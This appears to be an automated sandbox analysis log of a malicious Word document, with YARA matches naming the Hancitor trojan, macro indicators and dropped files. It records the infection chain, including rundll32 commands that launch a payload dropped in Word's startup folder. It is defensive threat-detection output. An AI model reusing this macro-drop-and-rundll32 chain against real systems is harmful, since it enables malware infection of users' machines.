              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 027D40E8 appears 47 times
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 027D6624 appears 65 times
              Source: 0524_4109399728218.docOLE, VBA macro line: Private Sub Document_Open()
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028182CC NtdllDefWindowProc_A,DefFrameProcA,5_2_028182CC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281D70C NtdllDefWindowProc_A,5_2_0281D70C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282748C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,5_2_0282748C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02831990 NtdllDefWindowProc_A,GetCapture,5_2_02831990
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02803E5C NtdllDefWindowProc_A,5_2_02803E5C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DFFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_0281DFFC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DF10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_0281DF10
              Source: 0524_4109399728218.docOLE indicator, VBA macros: true
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE indicator, VBA macros: true
              Source: 0524_4109399728218.LNK.1.drLNK file: ..\..\..\..\..\Desktop\0524_4109399728218.doc
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{905C0DA3-74DE-4233-9B57-2F4E7179B01B}.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@7/60@814/2
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027F883C GetLastError,FormatMessageA,5_2_027F883C
              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EE2C0 FindResourceA,LoadResource,SizeofResource,LockResource,5_2_027EE2C0
              Source: 0524_4109399728218.docOLE document summary: title field not present or empty
              Source: 0524_4109399728218.docOLE document summary: edited time not present or 0
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE document summary: title field not present or empty
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE document summary: author field not present or empty
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE document summary: edited time not present or 0
              Source: 0524_4109399728218.docVirustotal: Detection: 65%
              Source: 0524_4109399728218.docReversingLabs: Detection: 65%
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\0524_4109399728218.doc" /o "
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 0524_4109399728218.docOLE indicator, Word Document stream: true
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C3AFC820-F704-4039-93CB-2E74424E0595} - OProcSessId.datJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D8B14 GetDiskFreeSpaceA,5_2_027D8B14
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/settings.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/document.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/styles.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/item2.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/itemProps3.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/item3.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/itemProps2.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = [trash]/0000.dat
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = docProps/custom.xml
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
              Source: 0524_4109399728218.docStatic file information: File size 1335808 > 1048576
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02838ED0 push 02838F5Dh; ret 5_2_02838F55
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02861584 push dword ptr [ebp-14h]; ret 5_2_02861FEA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280429C push 028042DFh; ret 5_2_028042D7
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028043E8 push 02804414h; ret 5_2_0280440C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280431C push 02804348h; ret 5_2_02804340
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02804354 push 0280438Ch; ret 5_2_02804384
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D63A0 push 027D63CCh; ret 5_2_027D63C4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D639E push 027D63CCh; ret 5_2_027D63C4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EA078 push ecx; mov dword ptr [esp], edx5_2_027EA07D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028000E0 push 0280011Eh; ret 5_2_02800116
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D60E4 push 027D6135h; ret 5_2_027D612D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02858020 push 0285804Ch; ret 5_2_02858044
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02858078 push 028580A4h; ret 5_2_0285809C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E811C push 027E8169h; ret 5_2_027E8161
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0283A1E8 push 0283A214h; ret 5_2_0283A20C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E81F4 push 027E8220h; ret 5_2_027E8218
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EA1D8 push ecx; mov dword ptr [esp], edx5_2_027EA1DD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800128 push 02800154h; ret 5_2_0280014C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800160 push 02800198h; ret 5_2_02800190
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EA194 push ecx; mov dword ptr [esp], edx5_2_027EA199
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E6664 push 027E670Ch; ret 5_2_027E6704
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800630 push 0280065Ch; ret 5_2_02800654
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027FE694 push 027FE764h; ret 5_2_027FE75C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282E7A8 push ecx; mov dword ptr [esp], ecx5_2_0282E7AC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E670E push 027E683Ch; ret 5_2_027E6834
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800484 push 028004B0h; ret 5_2_028004A8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D6418 push 027D6444h; ret 5_2_027D643C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027DE4B8 push 027DE4E4h; ret 5_2_027DE4DC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0285C46C push 0285C4A4h; ret 5_2_0285C49C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028085B8 push ecx; mov dword ptr [esp], ecx5_2_028085BC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E65EC push 027E6662h; ret 5_2_027E665A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02861584 GetEnhMetaFileW,GetEnhMetaFileW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadLibraryA,GetProcAddress,VirtualAllocEx,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,DeleteObject,DeleteObject,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontR5_2_02861584
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)Jump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02834260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,5_2_02834260
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02816044 IsIconic,SetRect,GetWindowLongA,GetWindowLongA,AdjustWindowRectEx,SetRect,5_2_02816044
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02818E08 IsIconic,5_2_02818E08
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02818FC0 IsIconic,SetWindowPos,PostMessageA,5_2_02818FC0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281EF78 SendMessageA,SetClassLongA,IsIconic,InvalidateRect,5_2_0281EF78
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02818CFC IsIconic,BeginPaint,DrawIcon,EndPaint,5_2_02818CFC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027F4DD4 IsIconic,GetWindowPlacement,GetWindowRect,5_2_027F4DD4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281B2E0 IsIconic,SetWindowPos,PostMessageA,5_2_0281B2E0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028330B4 IsIconic,GetCapture,5_2_028330B4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281D794 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,5_2_0281D794
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028194AC IsIconic,IsZoomed,ShowWindow,5_2_028194AC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02819BD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,5_2_02819BD8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02833968 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,5_2_02833968
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02815EA0 SendMessageA,IsIconic,5_2_02815EA0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DFFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_0281DFFC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DF10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_0281DF10
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02838884 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,5_2_02838884
              Source: 0524_4109399728218.docStream path 'Data' entropy: 7.97217114132 (max. 8.0)
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
